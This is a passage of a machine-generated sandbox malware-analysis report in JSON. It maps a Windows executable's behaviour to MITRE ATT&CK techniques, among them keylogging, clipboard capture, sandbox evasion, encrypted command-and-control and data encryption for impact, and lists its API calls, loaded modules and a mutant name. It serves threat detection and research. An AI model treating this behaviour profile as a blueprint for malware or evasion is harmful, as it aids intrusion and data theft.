1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75400000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\asas-7PH439\"\n \"asas-7PH439\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a\" file has an entrypoint instructions - \"call\t0x434ecb,jmp\t0x434918,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x45717a,test\teax, eax,je\t0x434aa5,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x471d14], esi,call\t0x436f10,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70cd0000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"KERNEL32\" at base 76680000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"USER32\" at base 75fc0000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"NTDLL\" at base 779e0000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"SHELL32\" at base 76d90000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"SHLWAPI\" at base 76620000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"IPHLPAPI\" at base 73c40000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"RSTRTMGR\" at base 6c920000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"SSPICLI.DLL\" at base 75770000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"RPCRT4.DLL\" at base 75f10000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"KERNEL32.DLL\" at base 76680000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 75cf0000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 752b0000\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74e10000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter SetProcessDpiAwareness (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter NtUnmapViewOfSection (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GlobalMemoryStatusEx (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter IsWow64Process (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetComputerNameExW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter IsUserAnAdmin (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter SetProcessDEPPolicy (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter EnumDisplayDevicesW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetSystemTimes (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetConsoleWindow (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter NtSuspendProcess (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter NtResumeProcess (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetExtendedTcpTable (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetExtendedUdpTable (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationProcess (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetFinalPathNameByHandleW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter RmStartSession (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter RmRegisterResources (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter RmGetList (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter RmEndSession (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005960)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter Shell32 (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter Shlwapi (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter Iphlpapi (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter Rstrtmgr (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00005960)\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005960)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e6e6c@ADVAPI32.dll\"\n \"0e000f00703f6e6c@ADVAPI32.dll\"\n \"0e000f00cc3f6e6c@ADVAPI32.dll\"\n \"11001200b4476e6c@ADVAPI32.dll\"\n \"1100120048486e6c@ADVAPI32.dll\"\n \"120013008c486e6c@ADVAPI32.dll\"\n \"12001300e4486e6c@ADVAPI32.dll\"\n \"14001500dc6f6e6c@ADVAPI32.dll\"\n \"14001500f46f6e6c@ADVAPI32.dll\"\n \"140015000c706e6c@ADVAPI32.dll\"\n \"1700180024706e6c@ADVAPI32.dll\"\n \"0d000e003c706e6c@ADVAPI32.dll\"\n \"110012004c706e6c@ADVAPI32.dll\"\n \"1100120060706e6c@ADVAPI32.dll\"\n \"0d000e00f0666e6c@WININET.dll\"\n \"0d000e0060676e6c@WININET.dll\"\n \"1000110098676e6c@WININET.dll\"\n \"100011003c686e6c@WININET.dll\"\n \"10001100a4706e6c@WININET.dll\"\n \"10001100b8706e6c@WININET.dll\"\n \"14001500cc706e6c@WININET.dll\"\n \"14001500e4706e6c@WININET.dll\"\n \"12001300fc706e6c@WININET.dll\"\n \"1200130010716e6c@WININET.dll\"\n \"100011007c686e6c@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"d65e65c01876dd99a63b3fa6f97710fee7ad82e63d75ce7f34fd4343e5d9d20a.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n 